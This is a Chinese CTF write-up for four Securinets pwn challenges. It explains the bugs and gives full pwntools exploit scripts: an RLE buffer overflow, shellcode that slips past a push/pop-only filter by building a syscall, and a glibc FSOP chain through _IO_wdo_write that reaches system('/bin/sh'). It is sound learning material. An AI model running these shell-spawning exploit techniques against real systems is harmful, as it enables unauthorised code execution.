zip++#

Information#

Category: Pwn
Points: 500

Description#

why isn’t my compressor compressing ?!

Write-up#

问 AI，得知 compress 函数实现了一个 RLE (Run-Length Encoding) 压缩算法，压缩后格式为 [字节 1][重复次数 1][字节 2][重复次数 2]...，因此如果我们输入交替字符就会导致压缩率很差，溢出返回地址。

Exploit#

1
#!/usr/bin/env python3
2

3
from pwn import (
4
    ELF,
5
    args,
6
    context,
7
    flat,
8
    process,
9
    raw_input,
10
    remote,
11
)
12

13

14
FILE = "./main"
15
HOST, PORT = "pwn-14caf623.p1.securinets.tn", 9000
16

17
context(log_level="debug", binary=FILE, terminal="kitty")
18

19
elf = context.binary
20

21

22
def launch():
23
    global target
24
    if args.L:
25
        target = process(FILE)
26
    else:
27
        target = remote(HOST, PORT)
28

29

30
def main():
31
    launch()
32

33
    payload = flat(
34
        b"AB" * 0xC6,
35
        b"\xa6" * 0x11,
36
    )
37
    raw_input("DEBUG")
38
    target.sendafter(b"data to compress :", payload)
39
    raw_input("DEBUG")
40
    target.sendline(b"exit")
41

42
    target.interactive()
43

44

45
if __name__ == "__main__":
46
    main()

Flag#

Securinets{my_zip_doesnt_zip}

push pull pops#

Information#

Category: Pwn
Points: 500

Description#

Shellcoding in the big 25 😱

Write-up#

有意思，第一次见 python 写的 pwn 题，这题只允许使用 push, pop 和 int 3 指令，但是测试发现非法指令会导致 capstone 直接返回 None，使得后面的指令不会被检查。所以我们只要把 shellcode 写到非法指令后面即可。

祭出指令表：X86 Opcode and Instruction Reference Home

但是有个问题是，从 mmap 分配的地址开始执行，必定会碰到我们的非法指令，然后就会 abort 。这里的解决方法也很简单，因为我们可以操作栈，那么，我们只要把 rsp 变成 mmap 出来的地址，然后用 pop 先提高栈地址，然后再 push 降低栈地址的同时，也将栈上原先的指令覆盖掉了。用什么覆盖？当然是 nop 啦～

最后说一下怎么调试，我们只要知道这个 python 脚本的 pid 就可以用 gdb -p <pid> 挂载，只要知道 mmap 返回的地址就可以调试 shellcode，还有，善用 int 3 也很重要。

1
def run(code: bytes):
2
    # Allocate executable memory using mmap
3

4
    mem = mmap.mmap(
5
        -1, len(code), prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC
6
    )
7
    mem.write(code)
8

9
    # Create function pointer and execute
10
    func = ctypes.CFUNCTYPE(ctypes.c_void_p)(
11
        ctypes.addressof(ctypes.c_char.from_buffer(mem))
12
    )
13

14
    print(
15
        f"pid is: {os.getpid()}\nmem: {hex(ctypes.addressof(ctypes.c_char.from_buffer(mem)))}"
16
    )
17
    input("DEBUG")
18
    func()
19

20
    exit(1)

Exploit#

1
#!/usr/bin/env python3
2

3
import argparse
4

5
from pwn import (
6
    ELF,
7
    asm,
8
    b64e,
9
    context,
10
    flat,
11
    process,
12
    raw_input,
13
    remote,
14
    shellcraft,
15
)
16

17
parser = argparse.ArgumentParser()
18
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
19
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
20
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
21
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
22
args = parser.parse_args()
23

24

25
FILE = "./main.py"
26
HOST, PORT = "localhost", 1337
27

28
context(log_level="debug", terminal="kitty", arch="amd64")
29

30

31
def mangle(pos, ptr, shifted=1):
32
    if shifted:
33
        return pos ^ ptr
34
    return (pos >> 12) ^ ptr
35

36

37
def demangle(pos, ptr, shifted=1):
38
    if shifted:
39
        return mangle(pos, ptr)
40
    return mangle(pos, ptr, 0)
41

42

43
def launch(argv=None, envp=None):
44
    global target, thread
45

46
    if argv is None:
47
        argv = [FILE]
48

49
    if args.local and args.threads is not None:
50
        raise ValueError("Options -L and -T cannot be used together.")
51

52
    if args.local:
53
        if args.gdb and "qemu" in argv[0]:
54
            if "-g" not in argv:
55
                argv.insert(1, str(args.port))
56
                argv.insert(1, "-g")
57
        target = process(argv, env=envp)
58
    elif args.threads:
59
        if args.threads <= 0:
60
            raise ValueError("Thread count must be positive.")
61
        process(FILE)
62

63
        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
64
    else:
65
        target = remote(HOST, PORT, ssl=True)
66

67

68
def main():
69
    launch()
70

71
    payload = asm(
72
        """
73
        push r11
74
        pop rsp
75

76
        pop r15
77
        pop r15
78
        pop r15
79
        pop r15
80

81
        push r15
82
        push r15
83
        push r15
84
        """
85
    )
86

87
    payload += b"\x06" + asm(shellcraft.nop()) * 0xF
88
    payload += asm("add rsp, 0x100")
89
    payload += asm(shellcraft.sh())
90

91
    target.sendline(b64e(payload))
92

93
    target.interactive()
94

95

96
if __name__ == "__main__":
97
    main()

Flag#

Securinets{push_pop_to_hero}

push pull pops REVENGE#

Information#

Category: Pwn
Points: 500

Description#

you aint getting away with it , not on my watch .

Write-up#

这次题目加了输入和解码出来的指令之间的长度检测：

1
if code_len != decoded:
2
    print("nice try")
3
    return False

那就把非法指令 ban 掉了，测试使用 semantically equivalent encodings 也没啥用，绕不开这个长度检测。

最后思路是自己构造一个 syscall，然后调用 read，这样就可以把 shellcode 读进去，不被过滤。

官方的 solution 也是构造 read，不过官方的 wp 里面，syscall 不是自己造的，而是利用内存中现成的，所以只要操作 push，pop 到对应内存就能拿到了。而我这里用的方法就复杂了点，~~让我们假设内存空间非常贫瘠，寸草不生，根本没有残留的 syscall~~，那能不能凭空造一个出来？

由于这题也是 mmap 了一块 rwx 的内存，所以只要我们的内存中有 syscall 的机器码，它就能执行到，我们只要在执行前提前布置好调用 read 用到的寄存器即可。

CAUTION
由于这道题的特殊性，远程内存环境和本地肯定是大不相同的，因为我们不管是自己造 syscall 还是找现成的，都对内存环境布局有着极其严格的要求，所以这题必须在 docker 里跑，本地远程调试。

首先解决一下调试的问题，我们将容器启动后自动执行的指令改一下，挂上 gdbserver，开放 1234 端口用于调试：

1
CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/run
2
CMD ["gdbserver", ":1234", "socat", "TCP-LISTEN:5000,reuseaddr,fork", "EXEC:/app/run"]

然后 docker-compose.yml 也需要改，开放一下调试端口：

1
version: "3.8"
2

3
services:
4
  vertical_tables:
5
    build: .
6
    ports:
7
      - "1304:5000"
8
      - "1234:1234"
9
    deploy:
10
      resources:
11
        limits:
12
          cpus: "1"
13
          memory: 1000M
14
    read_only: true
15
    cap_drop:
16
      - all
17
    privileged: true

现在只要运行 docker compose up -d 就把容器跑起来了，然后 exp 直接连接 1304 端口与题目交互。

既然要自己造 syscall，那肯定得先搞清楚这玩意儿的机器码是多少，可以这样：

λ ~/ pwn asm -c amd64 "syscall"
0f05

那我们只要想办法弄到 \x0f 和 \x05 就成功了一半。观察内存，发现有一个现成的 \x05：

虽然也有现成的 \x0f，但是它行吗？我们可以做一个简单的测试，直接找一片空内存改，然后看看解析出来是什么指令：

并不是我们期望的 syscall，很简单，因为 amd64 是小端序的，所以我们不能写 \x0f，而是应该写 0x0f00000000000000。

至于为啥必须这样？因为我的想法是找一个带 \x0f 的 push or pop 指令放在最后，然后用一堆单字节的 push or pop 将 \x0f 卡到第八个字节的位置，最后将事先获取到的 \x05 通过 push 覆盖掉前面被挤出来的字节，就有了一个 syscall。

但是我们怎么保证，这样弄到了 syscall，它就一定会执行呢？因为我们不可能跳回到前面 syscall 的地方去执行。这就得益于来自上一题的灵感了，因为如果是非法指令的话，CPU 会卡在那里不往下走，但是一旦我们将非法指令替换成了合法指令，它就又能继续往下跑了～

这里选的指令是 pop fs，实测 push fs 不行。

所以我的 exp 就不难理解了，一开始的 0x4d 个 pop r15 是为了弄到 \x05，保存在 r15 里：

然后设置了调用 read 用到的几个寄存器，rax 不用管，本来就是 0，用它设置一下 rdi，然后利用内存中的残留值设置 rdx，rsi 可以最后栈迁移到 shellcode 的时候设置。

最后就是栈迁移回 shellcode，通过操作 push，pop 定位到要覆盖的指令处，最后将 \x05 填上去即可。

Exploit#

1
#!/usr/bin/env python3
2

3
import argparse
4

5
from pwn import (
6
    ELF,
7
    asm,
8
    b64e,
9
    context,
10
    flat,
11
    process,
12
    raw_input,
13
    remote,
14
    shellcraft,
15
    sleep,
16
)
17

18
parser = argparse.ArgumentParser()
19
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
20
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
21
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
22
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
23
args = parser.parse_args()
24

25

26
FILE = "./main.py"
27
HOST, PORT = "localhost", 1304
28

29
context(log_level="debug", terminal="kitty", arch="amd64")
30

31

32
def mangle(pos, ptr, shifted=1):
33
    if shifted:
34
        return pos ^ ptr
35
    return (pos >> 12) ^ ptr
36

37

38
def demangle(pos, ptr, shifted=1):
39
    if shifted:
40
        return mangle(pos, ptr)
41
    return mangle(pos, ptr, 0)
42

43

44
def launch(argv=None, envp=None):
45
    global target, thread
46

47
    if argv is None:
48
        argv = [FILE]
49

50
    if args.local and args.threads is not None:
51
        raise ValueError("Options -L and -T cannot be used together.")
52

53
    if args.local:
54
        if args.gdb and "qemu" in argv[0]:
55
            if "-g" not in argv:
56
                argv.insert(1, str(args.port))
57
                argv.insert(1, "-g")
58
        target = process(argv, env=envp)
59
    elif args.threads:
60
        if args.threads <= 0:
61
            raise ValueError("Thread count must be positive.")
62
        process(FILE)
63

64
        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
65
    else:
66
        target = remote(HOST, PORT, ssl=False)
67

68

69
def main():
70
    launch()
71

72
    payload = asm("pop r15") * 0x4D
73
    payload += asm(
74
        """
75
        pop rsp
76
        pop r15
77

78
        push rax
79
        pop rdi
80
        """
81
    )
82
    payload += asm("pop rbx") * 0x14
83
    payload += asm("pop rdx")
84
    payload += asm("push rbx") * 0x1B
85
    payload += asm(
86
        """
87
        push r11
88
        pop rsi
89

90
        push r11
91
        pop rsp
92
        """
93
    )
94
    payload += asm("pop rbx") * 0x20
95
    payload += asm("push r15")
96
    payload += b"\x0f\xa1"
97

98
    target.sendline(b64e(payload))
99
    target.sendline()
100

101
    sc = asm(shellcraft.nop() * 0x150 + shellcraft.sh())
102
    sleep(1)
103
    target.sendline(sc)
104

105
    target.interactive()
106

107

108
if __name__ == "__main__":
109
    main()

Flag#

复现。

V-tables#

Information#

Category: Pwn
Points: 500

Description#

idk

Write-up#

这题也是复现，当时我还没学 FSOP，所以就直接跳过了……

看了下官方 wp，发现这种题其实还是有迹可循的。

先看一下 IDA，逻辑特别简单：

1
void __fastcall setup(int argc, const char **argv, const char **envp)
2
{
3
  setbuf(stdin, 0);
4
  setbuf(stdout, 0);
5
}
6

7
__int64 vuln()
8
{
9
  printf("stdout : %p\n", stdout);
10
  read(0, stdout, 0xD8u);
11
  return 0;
12
}
13

14
int __fastcall main(int argc, const char **argv, const char **envp)
15
{
16
  setup(argc, argv, envp);
17
  vuln();
18
  return 0;
19
}

直接送了 libc 地址，然后可以修改 stdout 结构体，但是由于最大只能读 0xD8 字节，也就是正好覆盖整个 _IO_FILE 结构体，除了 vtable 字段写不到外。那常规的 House of Apple 就打不了了。

那怎么办？我们没有任何可以利用的地方了吗？未必。

先看一下最终的调用链：

熟悉程序生命周期的话，应该知道 main 函数返回其实会自动调用 exit，由于我们也干不了别的事了，那估计多半就是要去分析 exit 的流程找利用点了（有种被引导的感觉）。

exit 的实现如下：

1
void
2
exit (int status)
3
{
4
  __run_exit_handlers (status, &__exit_funcs, true, true);
5
}
6
libc_hidden_def (exit)

直接跟进到 __run_exit_handlers：


98 collapsed lines
1
/* Call all functions registered with `atexit' and `on_exit',
2
   in the reverse of the order in which they were registered
3
   perform stdio cleanup, and terminate program execution with STATUS.  */
4
void
5
attribute_hidden
6
__run_exit_handlers (int status, struct exit_function_list **listp,
7
       bool run_list_atexit, bool run_dtors)
8
{
9
  /* The exit should never return, so there is no need to unlock it.  */
10
  __libc_lock_lock_recursive (__exit_lock);
11

12
  /* First, call the TLS destructors.  */
13
  if (run_dtors)
14
    call_function_static_weak (__call_tls_dtors);
15

16
  __libc_lock_lock (__exit_funcs_lock);
17

18
  /* We do it this way to handle recursive calls to exit () made by
19
     the functions registered with `atexit' and `on_exit'. We call
20
     everyone on the list and use the status value in the last
21
     exit (). */
22
  while (true)
23
    {
24
      struct exit_function_list *cur;
25

26
    restart:
27
      cur = *listp;
28

29
      if (cur == NULL)
30
 {
31
   /* Exit processing complete.  We will not allow any more
32
      atexit/on_exit registrations.  */
33
   __exit_funcs_done = true;
34
   break;
35
 }
36

37
      while (cur->idx > 0)
38
 {
39
   struct exit_function *const f = &cur->fns[--cur->idx];
40
   const uint64_t new_exitfn_called = __new_exitfn_called;
41

42
   switch (f->flavor)
43
     {
44
       void (*atfct) (void);
45
       void (*onfct) (int status, void *arg);
46
       void (*cxafct) (void *arg, int status);
47
       void *arg;
48

49
     case ef_free:
50
     case ef_us:
51
       break;
52
     case ef_on:
53
       onfct = f->func.on.fn;
54
       arg = f->func.on.arg;
55
       PTR_DEMANGLE (onfct);
56

57
       /* Unlock the list while we call a foreign function.  */
58
       __libc_lock_unlock (__exit_funcs_lock);
59
       onfct (status, arg);
60
       __libc_lock_lock (__exit_funcs_lock);
61
       break;
62
     case ef_at:
63
       atfct = f->func.at;
64
       PTR_DEMANGLE (atfct);
65

66
       /* Unlock the list while we call a foreign function.  */
67
       __libc_lock_unlock (__exit_funcs_lock);
68
       atfct ();
69
       __libc_lock_lock (__exit_funcs_lock);
70
       break;
71
     case ef_cxa:
72
       /* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
73
   we must mark this function as ef_free.  */
74
       f->flavor = ef_free;
75
       cxafct = f->func.cxa.fn;
76
       arg = f->func.cxa.arg;
77
       PTR_DEMANGLE (cxafct);
78

79
       /* Unlock the list while we call a foreign function.  */
80
       __libc_lock_unlock (__exit_funcs_lock);
81
       cxafct (arg, status);
82
       __libc_lock_lock (__exit_funcs_lock);
83
       break;
84
     }
85

86
   if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
87
     /* The last exit function, or another thread, has registered
88
        more exit functions.  Start the loop over.  */
89
     goto restart;
90
 }
91

92
      *listp = cur->next;
93
      if (*listp != NULL)
94
 /* Don't free the last element in the chain, this is the statically
95
    allocate element.  */
96
 free (cur);
97
    }
98

99
  __libc_lock_unlock (__exit_funcs_lock);
100

101
  if (run_list_atexit)
102
    call_function_static_weak (_IO_cleanup);
103

104
  _exit (status);
105
}

没有注意到什么好玩的东西，除了 _IO_cleanup 外，因为它涉及到 IO 操作，可以跟进去看看：

1
int
2
_IO_cleanup (void)
3
{
4

5

6
  int result = _IO_flush_all ();
7

8
  /* We currently don't have a reliable mechanism for making sure that
9
     C++ static destructors are executed in the correct order.
10
     So it is possible that other static destructors might want to
11
     write to cout - and they're supposed to be able to do so.
12

13
     The following will make the standard streambufs be unbuffered,
14
     which forces any output from late destructors to be written out. */
15
  _IO_unbuffer_all ();
16

17
  return result;
18
}

此时，就涉及到了两个大函数需要分析，一个是 _IO_flush_all 一个是 _IO_unbuffer_all。

我在分析 _IO_flush_all 的时候没发现什么特别有意思的地方，但是它可以调用 _IO_OVERFLOW，然后这个函数里可以调用 _IO_do_write，于是想到一种方法：利用 main 函数返回自动调用 _IO_cleanup->_IO_flush_all flush _IO_2_1_stdout_ 结构体的时候，假设我们事先将其 _IO_write_base 改成 _IO_2_1_stdin_ 结构体的地址，由于 size 是通过 f->_IO_write_ptr - f->_IO_write_base 计算的，我也可以将其改大，这样让它触发 _IO_do_write，向 _IO_2_1_stdin_ 写任意大小数据，覆盖它的 vtable, （由于 _IO_list_all 链表的顺序是 stderr->stdout->stdin）这样，我 flush 完 stdout 再去 flush stdin 的时候是不是会调用我自定义的 vtable 去执行任意操作？

虽然想法很美好，但是我发现，_IO_do_write (f, f->_IO_write_base, f->_IO_write_ptr - f->_IO_write_base)->_IO_SYSWRITE (fp, data, to_do)->__write (f->_fileno, data, to_do)，也就是说，它只能向当前被 flush 的结构体的 _fileno 写数据……那这条路就行不通了。

其实还有一个想法，就是我将 _chain 修改为当前结构体 +0x8 的地址，这样就伪造了下一个被刷新的结构体，因为 +0x8，所以我们也就控制了 vtable，但是我们没有 _flags 的控制权，不知道行不行，只是一个潜在可行的想法，以后可以试试能不能打。

继续看下面的 _IO_unbuffer_all 了，看看能不能有什么发现：


25 collapsed lines
1
static void
2
_IO_unbuffer_all (void)
3
{
4
  FILE *fp;
5

6
#ifdef _IO_MTSAFE_IO
7
  _IO_cleanup_region_start_noarg (flush_cleanup);
8
  _IO_lock_lock (list_all_lock);
9
#endif
10

11
  for (fp = (FILE *) _IO_list_all; fp; fp = fp->_chain)
12
    {
13
      int legacy = 0;
14

15
      run_fp = fp;
16
      _IO_flockfile (fp);
17

18
#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1)
19
      if (__glibc_unlikely (_IO_vtable_offset (fp) != 0))
20
 legacy = 1;
21
#endif
22

23
      /* Free up the backup area if it was ever allocated.  */
24
      if (_IO_have_backup (fp))
25
 _IO_free_backup_area (fp);
26
      if (!legacy && fp->_mode > 0 && _IO_have_wbackup (fp))
27
 _IO_free_wbackup_area (fp);
28

29

30
      if (! (fp->_flags & _IO_UNBUFFERED)
31
   /* Iff stream is un-orientated, it wasn't used. */
32
   && (legacy || fp->_mode != 0))
33
 {
34
   if (! legacy && ! dealloc_buffers && !(fp->_flags & _IO_USER_BUF))
35
     {
4 collapsed lines
36
       fp->_flags |= _IO_USER_BUF;
37

38
       fp->_freeres_list = freeres_list;
39
       freeres_list = fp;
40
       fp->_freeres_buf = fp->_IO_buf_base;
41
     }
42

43
   _IO_SETBUF (fp, NULL, 0);
44

45
   if (! legacy && fp->_mode > 0)
46
     _IO_wsetb (fp, NULL, NULL, 0);
16 collapsed lines
47
 }
48

49
      /* Make sure that never again the wide char functions can be
50
  used.  */
51
      if (! legacy)
52
 fp->_mode = -1;
53

54
      _IO_funlockfile (fp);
55
      run_fp = NULL;
56
    }
57

58
#ifdef _IO_MTSAFE_IO
59
  _IO_lock_unlock (list_all_lock);
60
  _IO_cleanup_region_end (0);
61
#endif
62
}

注意到沿着 _IO_SETBUF 往下走的话会有一个好玩的东西：

1
FILE *
2
_IO_default_setbuf (FILE *fp, char *p, ssize_t len)
3
{
4
    if (_IO_SYNC (fp) == EOF)
5
 return NULL;
6
    if (p == NULL || len == 0)
7
      {
8
 fp->_flags |= _IO_UNBUFFERED;
9
 _IO_setb (fp, fp->_shortbuf, fp->_shortbuf+1, 0);
10
      }
11
    else
12
      {
13
 fp->_flags &= ~_IO_UNBUFFERED;
14
 _IO_setb (fp, p, p+len, 0);
15
      }
16
    fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end = NULL;
17
    fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_read_end = NULL;
18
    return fp;
19
}

藏在 _IO_SYNC 里面：

1
int
2
_IO_new_file_sync (FILE *fp)
3
{
4
  ssize_t delta;
5
  int retval = 0;
6

7

8
  /*    char* ptr = cur_ptr(); */
9
  if (fp->_IO_write_ptr > fp->_IO_write_base)
10
    if (_IO_do_flush(fp)) return EOF;
11
  delta = fp->_IO_read_ptr - fp->_IO_read_end;
12
  if (delta != 0)
13
    {
14
      off64_t new_pos = _IO_SYSSEEK (fp, delta, 1);
15
      if (new_pos != (off64_t) EOF)
16
 fp->_IO_read_end = fp->_IO_read_ptr;
17
      else if (errno == ESPIPE)
18
 ; /* Ignore error from unseekable devices. */
19
      else
20
 retval = EOF;
21
    }
22
  if (retval != EOF)
23
    fp->_offset = _IO_pos_BAD;
24
  /* FIXME: Cleanup - can this be shared? */
25
  /*    setg(base(), ptr, ptr); */
26
  return retval;
27
}
28
libc_hidden_ver (_IO_new_file_sync, _IO_file_sync)

然后走 _IO_do_flush，由于之前已经将 mode 改为了 1，所以这里会执行 _IO_wdo_write，而这，也是我们所期望的。

1
#define _IO_do_flush(_f)                                        \
2
  ((_f)->_mode <= 0                                             \
3
   ? _IO_do_write(_f, (_f)->_IO_write_base,                     \
4
    (_f)->_IO_write_ptr-(_f)->_IO_write_base)                   \
5
   : _IO_wdo_write(_f, (_f)->_wide_data->_IO_write_base,        \
6
     ((_f)->_wide_data->_IO_write_ptr                           \
7
      - (_f)->_wide_data->_IO_write_base)))

走到 _IO_wdo_write 就差不多快结束了。

1
/* Convert TO_DO wide character from DATA to FP.
2
   Then mark FP as having empty buffers. */
3
int
4
_IO_wdo_write (FILE *fp, const wchar_t *data, size_t to_do)
5
{
6
  struct _IO_codecvt *cc = fp->_codecvt;
7

8

9

10
  if (to_do > 0)
11
    {
12
      if (fp->_IO_write_end == fp->_IO_write_ptr
13
   && fp->_IO_write_end != fp->_IO_write_base)
25 collapsed lines
14
 {
15
   if (_IO_new_do_write (fp, fp->_IO_write_base,
16
    fp->_IO_write_ptr - fp->_IO_write_base) == EOF)
17
     return WEOF;
18
 }
19

20
      do
21
 {
22
   enum __codecvt_result result;
23
   const wchar_t *new_data;
24
   char mb_buf[MB_LEN_MAX];
25
   char *write_base, *write_ptr, *buf_end;
26

27
   if (fp->_IO_buf_end - fp->_IO_write_ptr < sizeof (mb_buf))
28
     {
29
       /* Make sure we have room for at least one multibyte
30
   character.  */
31
       write_ptr = write_base = mb_buf;
32
       buf_end = mb_buf + sizeof (mb_buf);
33
     }
34
   else
35
     {
36
       write_ptr = fp->_IO_write_ptr;
37
       write_base = fp->_IO_write_base;
38
       buf_end = fp->_IO_buf_end;
39
     }
40

41
   /* Now convert from the internal format into the external buffer.  */
42
   result = __libio_codecvt_out (cc, &fp->_wide_data->_IO_state,
43
     data, data + to_do, &new_data,
44
     write_ptr,
45
     buf_end,
46
     &write_ptr);
47

48
   /* Write out what we produced so far.  */
49
   if (_IO_new_do_write (fp, write_base, write_ptr - write_base) == EOF)
27 collapsed lines
50
     /* Something went wrong.  */
51
     return WEOF;
52

53
   to_do -= new_data - data;
54

55
   /* Next see whether we had problems during the conversion.  If yes,
56
      we cannot go on.  */
57
   if (result != __codecvt_ok
58
       && (result != __codecvt_partial || new_data - data == 0))
59
     break;
60

61
   data = new_data;
62
 }
63
      while (to_do > 0);
64
    }
65

66
  _IO_wsetg (fp, fp->_wide_data->_IO_buf_base, fp->_wide_data->_IO_buf_base,
67
      fp->_wide_data->_IO_buf_base);
68
  fp->_wide_data->_IO_write_base = fp->_wide_data->_IO_write_ptr
69
    = fp->_wide_data->_IO_buf_base;
70
  fp->_wide_data->_IO_write_end = ((fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
71
       ? fp->_wide_data->_IO_buf_base
72
       : fp->_wide_data->_IO_buf_end);
73

74
  return to_do == 0 ? 0 : WEOF;
75
}
76
libc_hidden_def (_IO_wdo_write)

我们发现下面这个 DL_CALL_FCT 其实是一个函数调用，而这个函数指针和参数我们都可以通过 overlapping 结构体来伪造。

虽然理想的情况是，令 gs 为 /bin/sh 指针，另 __fct 为 system，但是实际调试发现，但凡我们控制其中任意一个，另一个就无法控制了（控制 /bin/sh 的话就不能绕过 PTR_DEMANGLE (fct)，绕过 PTR_DEMANGLE (fct) 的话就不能控制 /bin/sh，而这一切都是因为它汇编层使用的寄存器是 r15，这个可以自己去调试，我不想再都截一遍图了，老实说有点恶心……）。由于任意代码执行的重要性更大，所以我选择控制 __fct，/bin/sh 则通过 add rdi, 0x10; jmp rcx 这个 gadget 控制。

1
#define DL_CALL_FCT(fctp, args) (fctp) args
2

3
enum __codecvt_result
4
__libio_codecvt_out (struct _IO_codecvt *codecvt, __mbstate_t *statep,
5
       const wchar_t *from_start, const wchar_t *from_end,
6
       const wchar_t **from_stop, char *to_start, char *to_end,
7
       char **to_stop)
8
{
9
  enum __codecvt_result result;
10

11

12
  struct __gconv_step *gs = codecvt->__cd_out.step;
13
  int status;
14
  size_t dummy;
15
  const unsigned char *from_start_copy = (unsigned char *) from_start;
16

17
  codecvt->__cd_out.step_data.__outbuf = (unsigned char *) to_start;
18
  codecvt->__cd_out.step_data.__outbufend = (unsigned char *) to_end;
19
  codecvt->__cd_out.step_data.__statep = statep;
20

21

22
  __gconv_fct fct = gs->__fct;
23
  if (gs->__shlib_handle != NULL)
24
    PTR_DEMANGLE (fct);
25

26
  status = DL_CALL_FCT (fct,
27
   (gs, &codecvt->__cd_out.step_data, &from_start_copy,
28
    (const unsigned char *) from_end, NULL,
29
    &dummy, 0, 0));
30

31
  *from_stop = (wchar_t *) from_start_copy;
32
  *to_stop = (char *) codecvt->__cd_out.step_data.__outbuf;
20 collapsed lines
33

34
  switch (status)
35
    {
36
    case __GCONV_OK:
37
    case __GCONV_EMPTY_INPUT:
38
      result = __codecvt_ok;
39
      break;
40

41
    case __GCONV_FULL_OUTPUT:
42
    case __GCONV_INCOMPLETE_INPUT:
43
      result = __codecvt_partial;
44
      break;
45

46
    default:
47
      result = __codecvt_error;
48
      break;
49
    }
50

51
  return result;
52
}

那现在问题就变成了，如何控制 rcx 指向 system？调试发现，rcx 的计算过程是可逆的，并且可以控制为任意值。具体流程，需要从 jmp rcx 开始反向溯源，看它是怎么得来的。最终发现，源头来自执行 _IO_wdo_write 时的 lea rcx, [r12 + r13*4]，rcx 从这里被设置后直到执行 __fct 都没有被修改过。

观察这条指令，我们不难想到，控制 rcx 要么就是令 r12 = system, r13 = 0，要么就是令 r12 = 0, r13 = system // 4。继续溯源 r12 发现，它是 rsi，即 (_f)->_wide_data->_IO_write_base。由于后面 overlapping 结构体的时候我用到了这个字段，所以我选择了令 r13 = system // 4，而 r13 也是可控的，为 rdx，即 (_f)->_wide_data->_IO_write_ptr - (_f)->_wide_data->_IO_write_base。

但是直接这样设置发现，并没有得到 system，于是我们继续往上溯源，看一下 rsi 和 rdx 到底是怎么传入的，发现，rdx 其实是被动过手脚的……

但很显然这是一个可逆计算，YAAAY～

Exploit#

1
#!/usr/bin/env python3
2

3
import argparse
4

5
from pwn import (
6
    ELF,
7
    ROP,
8
    FileStructure,
9
    context,
10
    flat,
11
    process,
12
    raw_input,
13
    remote,
14
)
15

16
parser = argparse.ArgumentParser()
17
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
18
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
19
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
20
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
21
args = parser.parse_args()
22

23

24
FILE = "./main_patched"
25
HOST, PORT = "localhost", 1337
26

27
context(log_level="debug", binary=FILE, terminal="kitty")
28

29
elf = context.binary
30
libc = elf.libc
31
rop = ROP(libc)
32

33

34
def mangle(pos, ptr, shifted=1):
35
    if shifted:
36
        return pos ^ ptr
37
    return (pos >> 12) ^ ptr
38

39

40
def demangle(pos, ptr, shifted=1):
41
    if shifted:
42
        return mangle(pos, ptr)
43
    return mangle(pos, ptr, 0)
44

45

46
def launch(argv=None, envp=None):
47
    global target, thread
48

49
    if argv is None:
50
        argv = [FILE]
51

52
    if args.local and args.threads is not None:
53
        raise ValueError("Options -L and -T cannot be used together.")
54

55
    if args.local:
56
        if args.gdb and "qemu" in argv[0]:
57
            if "-g" not in argv:
58
                argv.insert(1, str(args.port))
59
                argv.insert(1, "-g")
60
        target = process(argv, env=envp)
61
    elif args.threads:
62
        if args.threads <= 0:
63
            raise ValueError("Thread count must be positive.")
64
        process(FILE)
65

66
        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
67
    else:
68
        target = remote(HOST, PORT, ssl=True)
69

70

71
def main():
72
    launch()
73

74
    target.recvuntil(b"stdout : ")
75
    stdout = int(target.recvline(), 16)
76
    libc.address = stdout - libc.sym["_IO_2_1_stdout_"]
77
    add_rdi_0x10_jmp_rcx = libc.address + 0x000000000017D690
78
    system = libc.sym["system"]
79

80
    fp = FileStructure(null=stdout + 0x1260)
81
    fp.flags = 0x8
82
    fp.unknown2 = flat(
83
        {
84
            0x18: 0x1,  # fp->_mode
85
        },
86
        filler=b"\x00",
87
    )
88
    fp._IO_write_ptr = 1
89
    fp._IO_write_base = 0
90
    fp._wide_data = stdout - 0x8
91
    fp._codecvt = stdout + 0x28  # codecvt
92
    fp._IO_save_end = stdout + 0x8
93
    fp._IO_read_base = system // 0x4 << 0x2  # rdx
94
    fp.markers = stdout + 0x20  # gs->__shlib_handle
95
    fp._IO_save_base = add_rdi_0x10_jmp_rcx  # gs->__fct
96
    fp._IO_write_end = b"/bin/sh\x00"
97

98
    raw_input("DEBUG")
99
    target.send(bytes(fp))
100

101
    target.interactive()
102

103

104
if __name__ == "__main__":
105
    main()

Flag#

复现。